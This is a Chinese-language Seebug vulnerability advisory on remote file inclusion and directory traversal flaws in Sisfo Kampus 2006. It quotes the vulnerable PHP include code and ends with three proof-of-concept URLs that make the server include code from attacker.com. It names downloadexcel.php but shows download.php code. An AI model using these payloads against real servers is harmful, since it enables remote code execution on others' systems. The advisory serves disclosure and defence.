Lucene search

K
seebugRootSSV:588
HistoryNov 29, 2006 - 12:00 a.m.

Sisfo Kampus文件包含及目录遍历漏洞

2006-11-2900:00:00
Root
www.seebug.org
62

Sisfo Kampus是一款系统信息管理系统。

Sisfo Kampus在处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。

Sisfo Kampus的index.php和print.php脚本没有过滤slnt参数的输入,允许攻击者通过包含本地或外部资源的任意文件导致执行任意代码。

index.php中漏洞代码如下:

   -------------------------[Line 27]-----------------------------
   <?php
      if ($exec=='main.php' && file_exists("$themedir/main.php"))
           include "$themedir/main.php";
           else include $exec;
   ?>
   -------------------------[Line 31]------------------------------

print.php中漏洞代码如下:

   -------------------------[Line 15]------------------------------
   <?php
   include_once "sysfo/sysfo.common.php";

   if (isset($_REQUEST['print'])) {
   $print = $_REQUEST['print'];
   include "$print";
   }
   else die (DisplayHeader($fmtErrorMsg, $strNoDataTobePrint));

   include "disconnectdb.php";
   ?>
   -------------------------[Line 25]-------------------------------

此外,Sisfo Kampus的downloadexcel.php脚本没有正确过滤fn参数的输入,允许攻击者通过目录遍历攻击下载任意文件。

download.php中漏洞代码如下:

   -------------------------[Line 1]--------------------------------
   <?php
   DisplayHeader($fmtPageTitle, $strDownload);
   include "lib/file.common.php";
   if (isset($_REQUEST['dir'])) $dir = $_REQUEST['dir'];
   else $dir = $Download_dir;
   if (substr($dir, -1) != '/' && substr($dir, -1) != '\\') $dir = "$dir/";
   DisplayDownloadDir($dir);
   ?>
   -------------------------[Line 8]--------------------------------

E. Setio Dewo Sisfo Kampus 2006 (Semarang 3)
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

<a href=“http://www.sisfokampus.net” target=“_blank”>http://www.sisfokampus.net</a>


                                                http://www.victim.com/index.php?exec=http://attacker.com/evilcode.txt?
http://www.victim.com/print.php?print=http://attacker.com/evilcode.txt?
http://www.victim.com/index.php?exec=print&amp;print=http://attacker.com/evilcode.txt?